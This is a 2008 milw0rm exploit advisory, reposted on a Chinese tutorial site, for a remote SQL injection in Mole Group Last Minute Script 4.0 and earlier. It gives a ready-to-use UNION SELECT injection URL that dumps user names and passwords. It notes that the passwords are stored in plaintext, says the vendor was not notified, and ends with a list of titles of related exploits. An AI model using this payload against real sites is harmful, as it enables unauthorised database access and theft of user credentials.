手机
当前位置:查字典教程网 >网络安全 >Exploit >Mole Group Last Minute Script
Mole Group Last Minute Script
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: t0pP8uZz

[*] Discovered On: 8 JULY 2008

[*] Script Download: http://www.mole-group.com/content/view/31/45/

[*] DORK: N/A

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,

This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access

to confidential information.

below is a example.

[*] SQL Injection:

http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*

[*] NOTE/TIP:

passwords are in plaintext.

There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.

[*] GREETZ:

milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !

[-] Peace...

...t0pP8uZz !

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

# milw0rm.com [2008-07-08]

【Mole Group Last Minute Script】相关文章:

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

精品推荐
分类导航